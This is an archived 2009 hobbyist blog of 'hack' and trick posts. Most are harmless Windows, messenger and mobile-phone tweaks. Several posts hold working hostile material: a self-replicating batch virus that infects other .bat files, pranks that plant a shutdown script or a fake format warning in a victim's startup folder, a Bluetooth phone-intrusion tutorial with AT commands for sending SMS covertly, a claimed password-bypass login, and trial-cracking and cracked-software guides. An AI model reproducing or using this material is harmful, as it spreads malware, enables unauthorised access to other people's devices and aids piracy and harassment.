Saturday, March 28, 2009


Send unlimited Nudge on Live Messenger/MSN

Today i would like to share a little tip how to send unlimited nudges with no time limited on Live Messenger aka MSN

First, check your messenger version at [Help] > [About]
Make sure yours are at least (Build 8.5.xxxx.xxxx)
If not 8.5 please download the latest ones from
Microsoft.

Now download A-Patch140 (>Download Here<)
Unzip the only file in the archive and RUN it (A-Patch140rc1b9_WLM.exe)

When you first run, please UNTICK all option and click NEXT

Exit your Live Messenger now. (Full exit, not minimize it)

^ Picture above do the talking , click next

Now you will see a large list of options, you may config it freely to suit your personality, dun forget you can click [Next] for more options

The most important is on the config page 5/6, be sure to tick
[√] Remove Nudge Delay


Click [next], on the last page click [APPLY]

When you see this MaKE SurE your MSN IS already SHUT DOWN
Note: if you still get error (about messenger still running) when click [ok], please make sure your msn is exited . (you may also need to terminate the process on task manager, sometimes the messenger process still running on background)

If anything is sure click [OK] to apply the patch.
Please wait for a while this may takes some times depends what options you had chosen.

Click on [Finish] to exit the patch.

Signin to your live messenger to see what's different and dont forget to send unlimited nudge to your friends!

See my effect!!


ngantukngantuk

Friday, March 27, 2009


Hack Attack : Crack Date Protection in Trial Software

Have you ever had the software that you always wanted to have, but unfortunately it was a trial software that would expire after a specific period of time. Did you ever wish to take the trialware to last till anyday you want, and not the generic 30 days trial.

Well there you go.. A Freeware called Date Cracker 2000 allows you to just that. It allows you to extend the trial of your favorite software to virtually any date in the future.

date cracker

Having said that, Date Cracker is the program that the Software industry doesn’t want you to know about. Well using Date cracker is as simple as making a cup of Coffee. Just follow the instructions and in a few moments you will be using favorite trial software for as long as you wish.
  • Install Date Cracker and open it up from the Start Menu
  • Click Add
  • Add the description for your program.
  • Click the [...] Button at the bottom of the window.
  • Search for the executable of the file that you wish to crack.
  • Set the Simulated Run Date to any date you wish.
  • Click Run.

Well that was easy wasn’t it. Here are a few things I suggest you keep in mind before using Date Cracker.

  • Run the Software you wish to crack via Date Cracker when you first run it.
  • Date should be entered in the format : YYYY/MM/DD

Well that is it. Try it on stuff you have lying around in your Hard disk. Let me know if it works for you.



Disclaimer : This tutorial is meant for educational purposes only. I don’t recommend break laws to use the softwares. Cracking is Illegal!!



Hidden Emotions In Yahoo

Check out these hidden emotions in Yahoo!




Thursday, March 26, 2009


Unlimited Buzzes!!!! in Y! Messenger

Here is something really interesting to know the trick of yahoo messenger, a hidden yahoo messenger exploit came to my mind while chatting with my friends. It realy annoys the person with whom you are chatting.

Has anyone of your noticed how many times can you BUZZ/DING someone continously in yahoo messener? The answer is once in 5-7 seconds. you can’t press the BUZZ button more than once in 5-7 seconds. (Try it now)

yahoo exploit buzz

This is for preventing yahoo users to flood others with BUZZs which would disturb them if they are busy. But there’s an yahoo exploit for this feature it allows a user to BUZZ another user without any limitation.

The exploit is Very useful if someone dosen’t respond to your Chat. I found this exploit when I was chatting with one of my friend, and I had entered a message which I later realized, was a code in Yahoo Messenger.

The Message was:
<DING>


Like other codes which poped up smileys, this code () was the code for giving yahoo BUZZs. And this code can be used to overcome the BUZZ limitation.

You cant send more than one BUZZ in 5-7 seconds using the BUZZ button, but can use this code to give unlimited BUZZs.

Using this yahoo exploit, you can tease up the brain of the one who dosen’t reply back to you. Just Copy the code, paste it and enter, then carry on the paste and enter again-and-agian till the user responds to your messages…!
kenyitbabai

Thanks to Hackerslane.com for this post

Multi Google Talk

Just follow the simple steps Below:

1)Right click on the Google Talk shortcut.

2)click on Properties.

3)Go to Shortcut tab on Google Talk Properties window.

4)On the Target textbox, add in the /nomutex to the end of the line so that it looks like below (or you can simply copy and paste the below syntax and replace the original).

“c:\program files\google\google talk
\googletalk.exe” /nomutex

5)Click on OK.

I didn't have to do anything after this nd clicking on the shortcut multiple times just gave me different google talk window.

Alternative
To create a new shortcut for Google Talk:

1)Right-click on the desktop or anywhere you want to place the GTalk shortcut.
2)Select New on the right click context menu.
3)Then select Shortcut.
4)Copy and paste the following line to the text box when prompted to type the location of the item:

“c:\program files\google\google talk\googletalk.exe”
/nomutex

5)Click on Next.

6)Give the shortcut a proper name such as Google Talk or Google
Talk Multiple or Google Talk Polygamy.

8)Click OK until you are done.

Find who is Invisible on Yahoo messenger

Sometimes some of your friends who appear offline in yahoo messenger may not be actually offline, they may in the 'Invisible' mode. This maybe if they are trying to ignore you or are too busy to talk to anyone.

There is this small trick that you can use to find out what the truth is.

Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check. The chat window will open obviously.

Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be two possibilities

1.If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously .See in the picture below:
2. If the user is online (but in invisible mode), after few seconds (it can take up to one minute, depending on your connection speed), you should get a blank page like in the picture below. So you know that the user is online.



Multiple login in yahoo Without Using any Software



You can login with multiple id's on the same yahoo messenger without any download or patch .
Follow these steps :

1. Go to Start ----> Run . Type regedit, then enter .

2.Navigate to HKEY_CURRENT_USER --------> Software --->yahoo ----->pager---->Test

3.On the right page , right-click and choose new Dword value .

4.Rename it as Plural.

5.Double click and assign a decimal value of 1.

Its done!!
Now close registry and restart yahoo messenger and try Multiple Login
sengihnampakgigikenyitbabai

If You want it with out confusion then you have to Download this Patch.

>Download here<

Funny Computer Trick

Funny Computer Trick :

Check out these funny trick.

Copy and paste the java script code to the address bar of your browser :


javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i >
0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0)
;self.moveBy(0,-i);
self.moveBy(-i,0); } } }} Shw(6)

2: Press enter and watch your window's "shaking it". You can change the value of i if you wish.
kenyitgelakgulingbabai

Thursday, March 19, 2009


Unlock the Administrator account : Vista Hack

Turning on the Administrator account is straight forward. First, open an elevated command prompt by typing cmd into the Search box on the Start menu, right-clicking the command prompt icon that appears at the top of the Start menu, then selecting Run as administrator.

Then enter this command and press Enter:

Net user administrator /active:yes

From now on, the Administrator account will appear as an option on the Welcome screen, along with any user accounts you may have set up. Use it like any other account. Be aware that it won't have a password yet, so it's a good idea to set a password for it.

If you want to disable the account and hide it, enter this command at an elevated command prompt and press Enter:

Net user administrator /active:no

Tuesday, March 10, 2009


Download Youtube videos

There are 3 ways to Download Youtube videos :-

1. Downloading Youtube videos directly in flv format
:
2. By converting and Downloading Youtube videos :
3. By Internet Download Manager(I.D.M):


There are 3 ways to Download Youtube videos :-

1. Downloading Youtube videos directly in flv format
:
(Requirement: Java)

There is very easy way to download Videos is Simply adding Kiss to url of youtube video

How Does It Works?
  1. Whenever you are watching video on YouTube, goto the address bar at the top of your browser.
    Notice the URL is something like this: http://www.youtube.com/watch?v=VKMm4XBsqhk

  2. Just in front of the youtube.com domain name, insert the word 'kiss'.
    Eg. http://www.kissyoutube.com/watch?v=VKMm4XBsqhk

  3. Press the 'Enter' key and it will bring you to this website. Click on the download link provided to save the video to your computer.
NOTE: Remember to save your video with ".flv" extension. Eg. some_video_filename.flv.
Then you want flv player like :Real player we recommend to play the video.

celebrate
If above explaination is not good enough, try the video tutorial below.




2. By converting and Downloading Youtube videos :

Method :

1.Copy the URL of youtube video page, which you want to download.

2.Goto the file converting websites like Vixy.net , Mediaconverter.org
( I recommend mediaconverter.org)

3. If you are going to vixy.net or mediaconverter.org you will easily understand,what is next to do
Do the steps as given and download the video and Enjoy! celebrate

3. By Internet Download Manager(I.D.M):

Download IDM(+crack) from here for free

1.Download And Install IDM

2.Goto the video page which you want to download.

3.Point the cursor on video. "Download this video" will appear on the top right of the video.

4.Download And Enjoy! celebrate

Note: you will find the video in : Documents-->Download-->Video


babai


Login to any Password Protected PC without any Software

I found this playing while playing with my keyboard, when I had forgotten the Admin password of my desktop!And then trying an admin trick.
This easy hack can be used to login to password protected PCs, or any Pc of which you don’t have the pass. be it your own computer.This can save your precious files, lost if you reinstall OS onto your PC.


1. Make a good use of it.On the Welcome Screen, where it asks to enter password, click on the user and when it asks for password…

2.Press Ctrl+Alt+Del and leave the keys and repeat it once more Ctrl+Alt+Del, then Backspace, followed by Enter.

3.Repeat step 2.

4.A screen pops-up asking you to enter the User and Pass., am I right?

5.I the user field, enter “administrator” and leave the pass. field blank.

6.Login and you’re done.Then you can go to Control Panel if you want to remove password from your user account or do what you wanted if its someone’s PC.The

HacK is that the Administrator account is never deleted and is the main Admin AC for Windows.

Bluetooth Intrusion: How it works

(Note: The below Article does not belong to me, so use it on your own risk!)

A tutorial I wrote a long time back for neworder group surprised The fundamentals of Bluetooth Security still remain same. Read on

This manual aims at enabling all people know the Pandora’s box in their very own pocket and know how it works! Mobile Phone Bluetooth enabled

Bluetooth, as we all know is a method for wirelessly transmitting the data over networks. Nowadays, it’s more seen in mobile phones. In India after the Cell phone revolution almost all people are now switching over to Bluetooth enabled cell phones to make their lives easier by allowing free transmission of data in a comfortable range and gaming etc. to the owner.

It is relatively better than Infrared (the one in your TV remote), operates on low power, and is a low cost technology with no usage charges. So no reason that it won’T be popular!

However in the mind of a hacker the ways to intrude keep germinating. As I said nothing is unbreakable! Bluetooth too. So before this cranky lecture gets over your nerves, I start the real thing.

It has been found that the complete memory contents of some mobile phones can be accessed by a previously trusted (”paired”) device that has since been removed from the trusted list. This data includes not only the phonebook and calendar, but media files such as pictures and text messages. In essence, the entire device can be “backed up” to an attacker’s own system.

A good attacker generally creates a serial profile connection to the device, for obtaining full access to the AT command set( the same commands that connect your modem the internet although different for BT phones), which can then be exploited using tools freely available online, such as PPP for networking and messaging, contact management(deletion and addition), diverts and initiating calls, connect to data services such as the Internet through GPRS, and even monitor conversations in the vicinity of the phone. This latter is done via a voice call over the GSM network, so the attacker can be anywhere in the world. Bluetooth access is only required for a few seconds in order to set up the call. Call forwarding diverts can be set up, making the innocent owner’s incoming calls to be intercepted, either to provide a channel for calls to more expensive destinations, or for identity theft by impersonation of the victim. Hackers are getting smart. So should be you

************************
The Indian context
************************
He can even use that for transferring the balance on his cash card by transferring it from yours! (This is the exploit I discovered recently in the biggest GSM company in India while I was playing around with Bluetooth)
Sounds scary!
It is!
Bluetooth devices are classified among three classes
Class 1 - Range=high, up to 100 meters
Class 2 - Range=Medium, up to 10 meters
Class 3 - Range =low, very much within 10

We are dealing with Class 2 and 3 devices.
Every Bluetooth-enabled device has some characteristics that are either unique (Bluetooth device address), manufacturer specific (the first part of the Bluetooth device address) or model-specific (service description records).
Bluetooth Device Address
Bluetooth device address is something like IP address, unique for each device set. This address consists out of 6 bytes (looks like MAC addresses MM:MM:MM:XX:XX:XX). This address can also be understood as hardware address that is written in the ROM in the chipset of the device. The first three bytes of this address (the M-bytes in the above notation sample) tell us about the manufacturer of the Device. This is the first step to know about the device’s properties . @stake’s redfang tool does this. Unfortunately, it is not possible to tell upon the number range of the address part of the device address (the X-bytes in the above notation sample) which model it is.
Service Discovery Protocol Records
Each Bluetooth device that accepts communication from other Bluetooth devices announces its offered services through a service discovery protocol (SDP) Its like a profile of the device. So, remote devices can query devices upon the offered capabilities. SDP records are returned to the querying device and hold information on how to access the respective service. My method now hashes certain values from the SDPs and generates a unqiue fingerprint value that is then used to refer to a certain phone model.
Take a look at this SDP
Service Name: OBEX Object Push
Service Handle: 000×10c
Service Class ID list:
“OBEX Object Push (0001cx)
Protocol Descriptor list:
(0×0100)
Channel:9
Version:0×100
/ from Nokia 6310i

Now the attacker will run “Blueprint software and obtain the following result:
00:60:57@2621543
Device: Nokia 6310i
Version: V 5.22 15-11-200x NP
Type: Mobile phone
Note: Vulnerable to Bluebug attack /* A type of attack

How the attack begins!

First step is to scan all the devices in the range of the phone (here I will limit my manual to mobile phones only) after know whom to bluejack/attack the hacker sends him a message using his Bluejack software on the phone.
This is normally only possible if the device is in “discoverable” or “visible” mode, but there are tools available on the Internet that allow even this safety to be bypassed easily.
I have written a program in Perl language for such intrusions. Use it to check your phone’s vulnerability to attacks. I will give you the source later in NH group.

How to send SMS from a hacked phone!
This technique can be used by the attacker to know your mobile phone number by sending SMS to himself. ( now you can think of the consequences, blackmailing etc) .
SMS messages can be sent by using SMS PDUs which are different for each company of the phone.
For Nokia PDU visit the German site www.nobbi.com . The sending of the SMS is not generally visible by the user of the attacked phone. Settings can be made for not generating the delivery reports on the phone. So it makes the sending completely hidden for the hacker

AT commands:

AT+CMGF=0 //Set PDU mode AT+CSMS=0 //Check if modem supports SMS commands AT+CMGS=23 //Send message, 23 octets (excluding the two initial zeros) >0011000B916407281553F80000AA0A

E8329BFD4697D9EC37There are 23 octets in this message (46 ‘characters’). The first octet (”00?) doesn’t count, it is only an indicator of the length of the SMSC information supplied (0). The PDU string consists of the following

In the same way a call can be initiated on the hacked phone using AT commands that are freely available on net.

This is how one can start from the scratch and easily attack anyone in the range having a BT enabled phone.
For newbies and script kiddies I have few assorted tools in .SIS format that will do the needful for them. You can have the full package in the NH files section!
But its’ always advisable to try out the real programming as it turns on the real hacking spirit in you.
Till the next update, bye!

Sunday, March 8, 2009


CHANGE WINDOWS LOGON SCREEN

u can use desktop enhancement s/w which can actually chage the complete appearence of the windows log on screen if that is what you ment and also u can get transperency , etccc.. or follow :To change the logon screen saver, follow these steps.
WARNING: If you use Registry Editor incorrectly, you may cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that you can solve problems that result from using Registry Editor incorrectly. Use Registry Editor at your own risk.1. Click Start, and then click Run. 2. In the Open box, type regedt32, and then click OK. 3. In the Registry Editor window, locate the following registry key:HKEY_USERS\.DEFAULT\Control Panel\Desktop 4. In the right pane, double-click SCRNSAVE.EXE. 5. In the Edit String dialog box, type the name of the screen saver that you want in the Value data box, and then click OK. For example, if you want to use the Mystify screen saver as your logon screen saver, type ssmyst.scr. IMPORTANT: Make sure that you correctly specify the path to the screen saver. If the screen saver is located in %SystemRoot%\System32, the explicit path is not required. 6. Click Exit on the File menu to quit Registry Editor.
The logon screen saver changes to the screen saver that you specified.



also u can use the software TUNE UP UTILITIES.Also this software can be used to change windows defult icons,registry cleaning,logon screen changing,...............etc a lot of applications.I swear its a very good ,powerful and user friendly...............

CLONING HARDDISK WITHOUT ANY SOFTWARE

How to Clone a Hard Drive

Did know that you could clone your current Hard Drive without having to by extra software? Maybe you didn't know that all that you needed, was already set up on your current system? Well, it is... and if you follow this tut, you shouldn't have much of a problem...


Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.

First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.

Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag.

Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the "Full" button.

Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says "Autofix Errors".

Fifth: In this final part, you might want to cut-and-paste to code in, unless you are sure that you can do it without making any mistakes:

Click on the "Start" button, then click on the "Run..." button, then place the following into the Runbox:

"XCOPY C:\*.*D:\ /c/h/e/k/r" (minus the quotes, of course) then press the "Enter" button.

If you receive an error message, then remove the space from between XCOPY and C:\

Anything that should happen to come up in the DOS box, just click "Y" for "Yes". When its all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out.

This tut has worked and has been tested on all systems except for Windows 2000, so you really shouldn't have any problems. If, by any chance, you should come across a snag, message me and I'll walk you through it.

~cheers~

angel

COMPRESS DRIVE TO SAVE DISKSPACE

Compress drive to save disk space

its not possible to increase ur memory size but u can compress ur data to save ur disk space, this feature is available in NTFS drive..
if u have a fat or fat32 drive, u can convert it to ntfs by running a command on dos:
for c drive:
convert c:/fs:ntfs
for d drive:
convert d:/fs:ntfs
for e drive:
convert e:/fs:ntfs
run the command similarly if u have more drive...


Compresing data in NTFS

* open my computer
* select any drive(drive with NTFS format)
* right click and select properties
* click on general tab
* select "compress drive to save disk space"
* Apply and OK

ur data will remain safe...


SPEED UP BOOTING

Speedup boot up sequence by defragmenting all key boot files tip:
Open Registry by going to START-RUN and typing REGEDIT. Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction. In right hand panel look for Enable. Right click on it and set it 'Y' for enable. This is the way I have it set on my computer. This will help speedup boot time.

MAKE A FOLDER ININCIBLE

Make your folders invicible...:)

1)Right Click on the desktop.Make a new folder
2)Now rename the folder with a space(U have to hold ALT key and type 0160).
3)Now u have a folder with out a name.
4)Right click on the folder>properties>customize. Click on change icon.
5)Scroll a bit, u should find some empty spaces, Click on any one of them.

click ok

Saturday, March 7, 2009


CREATE A SCARY VIRUS BUT HARMLESS

Open notepad and type this:
lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")

Then save it as Virus.VBS

and go to the folder that contains it and open it if a window pops out saying a virus has been detected it's working. Press yes or no to close the window and put it in the startup folder of the victim's account.On startup the window should appear.Note: This does not harm your computer as it does not contain virus.

VIRUS TO MAKE THE PC RESTART REPEATEDLY

MAKE COMPUTER KEEP RESTARTING


1.open note pad

2.type "shutdown -s" with out quotes

3.save the file with .bat extension


4.explaination,u have created a prog which shutdowns the pc with in 30 of executing the file

5. now open "x:\Documents and Settings\USERNAME\Start Menu\Programs\Startup\" (x->is the drive on which ur windows has been installed and USERNAME is the username)

6.paste a shortcut on this directory



NOW WHEN EVER UR FRIEND STARTS HIS PC a count down will start after 30 sec his pc will shutdown
u can also maki his pc restart instead of shutting down.. just replace "shutdown -s" "restart _s"

enjoy.... this is not a virus but look so....

Virus Code

A simple VIRUS code is here: Just save the following code as .bat extension in notepad.The antivirus will detect it as virus. see for yourself.
It will affect *.com and *.EXE files .It will multiply itself and may get more dangerous when altered.






@echo off>nul.ViRuS
if "%1=="/ViRuS_MULTIPLY goto ViRuS_multiply
if "%1=="/ViRuS_OUTER_LOOP goto ViRuS_outer_loop
if "%1=="/ViRuS_FINDSELF goto ViRuS_findself
if "%VOFF%=="T goto ViRuS_OLDBAT

set ViRuSname=%0
if not exist %0.bat call %0 /ViRuS_FINDSELF %path%
if not exist %ViRuSname%.bat set ViRuSname=
if "%ViRuSname%==" goto ViRuS_OLDBAT

rem ViRuS if batch is started with name.BAT, virus will not become active
rem ViRuS it was a bug, now it's a feature ! (also notice the voff variable)
rem ViRuS also if batch was only in an append /x:on path (chance=minimal)

attrib +h %ViRuSname%.bat
for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a
attrib -h %ViRuSname%.bat
set ViRuSname=
goto ViRuS_OLDBAT

:ViRuS_findself
if "%2==" goto XXX_END>nul.ViRuS
if exist %2\%ViRuSname%.bat set ViRuSname=%2\%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
shift>nul.ViRuS
goto ViRuS_findself

:ViRuS_outer_loop
for %%a in (%2\*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a
goto XXX_END>nul.ViRuS

:ViRuS_multiply
find "ViRuS" <%ViRuSname%.bat >xViRuSx.bat
find /v "ViRuS" <%2 |find /v ":XXX_END" >>xViRuSx.bat
echo :XXX_END>>xViRuSx.bat
copy xViRuSx.bat %2>nul
del xViRuSx.bat
goto XXX_END>nul.ViRuS

:ViRuS_OLDBAT
echo on>nul.ViRuS
echo This is the dummy Virus Created By Elite and Rishabh
:XXX_END

Posted by

Autoplay virus solution

autoplay virus solution- if u have problem with ur drives that they are not opening when u double click on then, then apply this trick

u must have winrar
if d:\ doesnt opens,,,,,open winrar and goto d:\ in tht.....u ll be seeing file name "autoplay.inf"....delete tht file..
now refrsh ur drives...
the virus is gone

SONY ERICSSON MOBILE CHEATS

.:: Ericsson ::.
                                                          Sony
Ericson T65
*#05# Fake Insert puk screen Press no to exit
Ericsson T20


Ericsson T20

MENU tecnichal Info
[type] >*<<*<* Displays : 1] Info service 1] Info SW 2] Info hardware 3] SIMlock 4]setup 2] Service setup 1] Contrast 3]Service Test 1] Display 2]Leds 3]Keyboard 4] ringer 5] Vibration 6]Headset 7] Microphone 8]Clock 4] Names List MENU info [Type] >*<<**<>*<<*<* menu Tecnichal info SW vers. and name list >*<<**<> are the right and left menu's keys
Ericsson T18s/T10/A1018s
>*<<*<* software CXC125065 Internal product code PRG 970715 1515 Software version and SW rev. <* CLR <><** >*<<*<*> Displays texts and messages in the phone
It will be displayed " TEXT " then push YES
<> are the right and left menu's keys
!!!><** Control /Enable SIM Lock!!! Ericsson R310 Go to Top Technical Info : >*<<*<* Options : 1) service Info info Software Simlock Configuration 2) Service Test Display Led/Illumination Keyboard ringer Vibration Headset Microphone Clock 3)Text's name List Info personal : >*<<**<

SIM Locking ( 8 digits' code ) ( it could harm your phone )
1) Network
2) Subnetwork
3) SP
4) Corporate


SAMSUNG MOBILE CHEATS

FOR SAMSUNG MOBILES :-

*#06# -> Show IMEI

*#9999# -> Show Software Version

*#0837# -> Show Software Version (instructions)

*#0001# -> Show Serial Parameters

*#9125# -> Activates the smiley when charging.

*#9998*228# ->Battery status (capacity, voltage, temperature)

*#9998*246# -> Program status

*#9998*289# -> Change Alarm Buzzer Frequency

*#9998*324# -> Debug screens

*#9998*364# -> Watchdog

*#9998*377# -> EEPROM Error Stack - Use side keys to select values. Cancel and ok.

*#9998*427# -> Trace Watchdog

*#9998*523# -> Change LCD contrast - Only with version G60RL01W

*#9998*544# -> Jig detect

*#9998*636# -> Memory status

*#9998*746# -> SIM File Size

*#9998*778# -> SIM Service Table

*#9998*785# -> RTK (Run Time Kernel) errors - if ok then phn is reset, info is put in memory error. *#9998*786# -> Run, Last UP, Last DOWN

*#9998*837# -> Software Version

*#9998*842# -> Test Vibrator - Flash the screenligth during 10 seconds and vibration activated.

*#9998*862# -> Vocoder Reg - Normal, Earphone or carkit can be selected

*#9998*872# -> Diag

*#9998*947# -> Reset On Fatal Error

*#9998*999# -> Last/Chk
*#9998*9266# -> Yann debug screen (=Debug Screens?)

*#9998*9999# -> Software version
*0001*s*f*t# -> Changes serial parameters (s=?, f=0,1, t=0,1) (incomplete)
*0002*?# -> unknown
*0003*?# -> unknown


SP-unlock SGH-600 and SGH 2100
*2767*3855# -> Full EEPROM Reset ( THIS CODE REMOVES the Security Lock and formats The Mobile's Chipset )

But also changes IMEI to 447967-89-400044-0,

*2767*2878# -> Custom EEEPROM Reset ( does not change the securitu CODE )

These codes has been tested with version FLD_2C6 G60SB03X of Samsung SGH-600

NOKIA NEW MOBILE CHEATS

Mobile Cheats


NOKIA


1 Imagine ur cell battery is very low, u r expecting an important call and u don't have a charger.

Nokia instrument comes with a reserve battery. To activate, key is "*3370#"

Ur cell will restart with this reserve and ur instrument will show a 50% incerase in battery.

This reserve will get charged when u charge ur cell next time.

*3370# Activate Enhanced Full Rate Codec (EFR)-Your phone uses the best sound quality but talk time is reduced by approx. 5%
#3370# Deactivate Enhanced Full Rate Codec( EFR)


*#4720# Activate Half Rate Codec - Your phone uses a lower quality sound
but you should gain approx 30% more Talk Time
*#4720# Deactivate Half Rate Codec

2 *#0000# Displays your phones software version,

1st Line :S oftware Version,
2nd Line : Software Release Date,
3rd Line : Compression Type
3 *#9999# Phones software v ersion if *#0000# does not work

4 *#06# For checking the International Mobile Equipment Identity (IMEI Number)

5 #pw+1234567890+1# Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

6 #pw+1234567890+2# Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

7 #pw+1234567890+3# Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

8 #pw+1234567890+4# SIM Card Lock Status.(use the "*" button to obtain the "p,w" and "+" symbols)

9 *#147# (vodafone) this lets you know who called you last *#1471# Last call (Only vodofone)

10 *#21# Allows you to check the number that "All Calls" are diverted To

11 *#2640# Displays security code in use


12 *#30# Lets you see the private number

13 *#43# Allows you to check the "Call Waiting" status of your phone.

14 *#61# Allows you to check the number that "On No Reply" calls are diverted to

15 *#62# Allows you to check the number that "Divert If Unrea chable(no service)" calls are diverted to

16 *#67# Allows you to check the number that "On Busy Calls" are diverted to

17 *#67705646#R emoves operator logo on 3310 & 3330

18 *#73# Reset phone timers and game scores

19 *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it
means you will get the best standby time possible

20 *#7760# Manufactures code

21 *#7780# Restore factory settings

22 *#8110# Software version for the nokia 8110

23 *#92702689# (to rember *#WAR0ANTY#)

Displays -
1.Serial Number,
2.Date Made
3.Purchase Date,
4.Date of last repair (0000 for no repairs),
5.Transfer User Data.
To exit this mode -you need to switch your phone off then on again

24 *#94870345123456789# Deactivate the PWM-Mem

25 **21*number# Turn on "All Calls" diverting to the phone number entered

26 **61*number# Turn on "No Reply" diverting to the phone number entered

27 **67*number# Turn on "On Busy" diverting to the phone number entered

Each command is prefixed with either one or two * or # characters as follows:
** Register and Activate
* Activate
## De-Register (and Deactivate)
# Deactivate
*# Check Status
© Call button



Once each command has been entered, if it is a network command (as opposed to a local handset command) it must be transmitted to the network by pressing the YES (receiver) key which acts as an enter key - this is represented here with the © character. Always enter numbers in full international format +CountryAreaNumber ( e.g. +447712345678).

Command Description Command String
Security
Change call barring code **03*OldCode*NewCode*NewCode#©
Change call barring code **03*330*OldCode*NewCode*NewCode#©
Change PIN code **04*OldPIN*NewPIN*NewPIN#©
Change PIN2 code **042*OldPIN2*NewPIN2*NewPIN2#©
Unlock PIN code (when PIN is entered wrong 3 times) **05*PUK*NewPIN*NewPIN#©
Unlock PIN2 code (when PIN2 is entered wrong 3 times) **052*PUK2*NewPIN2*NewPIN2#©
Display IMEI *#06#
Call Forwarding (Diversions)
De-register all call diversions ##002#©
Set all configured call diversions to number and activate **004*number#©
De-register all configured call diversions (no answer, not reachable, busy) ##004#©
Unconditionally divert all calls to number and activate **21*number#©
Activate unconditionally divert all calls *21#©
De-register unconditionally divert all calls ##21#©
Deactivate unconditionally divert all calls #21#©
Check status of unconditionally divert all calls *#21#©
Divert on no answer to number and activate **61*number#©
Activate divert on no answer *61#©
De-register divert on no answer ##61#©
Deactivate divert on no answer #61#©
Check status of divert on no answer *#61#©
Divert on not reachable to number and activate **62*number#©
Activate divert on not reachable *62#©
De-register divert on not reachable ##62#©
Deactivate divert on not reachable #62#©
Check status of divert on not reachable *#62#©
Divert on busy to number and activate /td> **67*number#©<
Activate divert on busy *67#©
De-register divert on busy ##67#©
Deactivate divert on busy #67#©
Check status of divert on busy *#67#©
Change number of seconds of ringing for the given service before diverting a call (such as on no answer). Seconds must be a value from 5 to 30. De-registering the same divert will also delete this change! **service*number**seconds#© (Service numbers, see below)
Call barring
Activate barr all outgoing calls (see Security to set code) **33*code#©
Deactivate barr all outgoing calls #33*code#©
Check status of barr all outgoing calls *#33#©
Activate barr all calls **330*code#©
Deactivate barr all calls #330*code#©
Check status of barr all calls /td> *#330*code#©<
Activate barr all outgoing international calls **331*code#©
Deactivate barr all outgoing international calls #331*code#©
Check status of barr all outgoing international calls *#331#©
Activate barr all outgoing international calls except to home country **332*code#©
Deactivate barr all outgoing international calls except to home country #332*code#©
Check status of barr all outgoing international calls except to home country *#332#©
Activate barr all outgoing calls **333*code#©
Deactivate barr all outgoing calls #333*code#©
Check status of barr all outgoing calls *#333#©
Activate barr all incoming calls **35*code#©
Deactivate barr all incoming calls #35*code#©
Check status of barr all incoming calls *#35#©
Activate barr all incoming calls when roaming **351*code#©
Deactivate barr all incoming calls when roaming #351*code#©
Check status of barr all incoming calls when roaming *#351#©
Activate barr all incoming calls **353*code#©
Deactivate barr all incoming calls #353*code#©
Check status of barr all incoming calls *#353#©
Call waiting
Activate call waiting *43*#©
Deactivate call waiting #43##©
Check status of call waiting *#43#©
Calling Line Identification
The following only works if CLIP and CLIR are enabled (ask your service provider)
CLIP: Presentation of the number of the incoming call
Activate CLIP **30#©
Deactivate CLIP ##30#©
Check status of CLIP *#30#©
CLIR: Presentation of one's own number to the to the called party
Activate CLIR **31#©
Activate CLIR for the actual call *31#number©
Deactivate CLIR ##31#©
Deactivate CLIR for the actual call #31#number©
Check status of CLIR *#31#©
COLP: Presentation of the actual number reached (if number called was diverted to another number
Activate COLP *76#©
Deactivate COLP #76#©
Check status of COLP *#76#©
COLR: Presentation of the original number called by the calling party (if the call was diverted to this cellphone)
Activate COLR *77#©
Deactivate COLR #77#©
Check status of COLR *#77#©

Friday, March 6, 2009


Crazy script hack

This a small javascript hack, which can edit or earase the web page.

1)Open a browser, Goto any website like Yahoo, Google,etc...

2) Put this code in the URL locator:

javascript: document.body.
contentEditable = 'true'; document.
designMode = 'on'; void 0

Then press enter. That's all
Enjoy!!,,

Remove Recycle Bin

How to remove Recycle Bin Icon from Desktop

If using XP Pro

Go to START > RUN

Type GPEDIT.MSC

Navagate to USER CONFIGURATION >ADMINISTRATIVE TEMPLATES >Click on DESKTOP,

On the right hand pane find " Remove Recycle Bin icon on the desktop " , double left click on it to ENABLE it.

Sorted!


If using XP Home

Create or modify the following registry entry

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel

{645FF040-5081-101B-9F08-00AA002F954E}

REG_DWORD

0x00000001

Increase Virtual RAM - To Make Your System Faster

Follow the steps given below :-


1) Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard.
Another way is Right-Clicking 'My Computer' and then Select 'Properties'.

2) Click on the 'Advanced' tab.

3) Under 'Performance', click 'Settings'.

4) Then click the 'Advanced' tab on the button that pops up.

5) Under 'Virtual Memory' at the bottom, click 'Change'.

6) Click the 'Custom Size' button.

7) For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000).

8) Click 'Set', and then exit out of all of the windows.

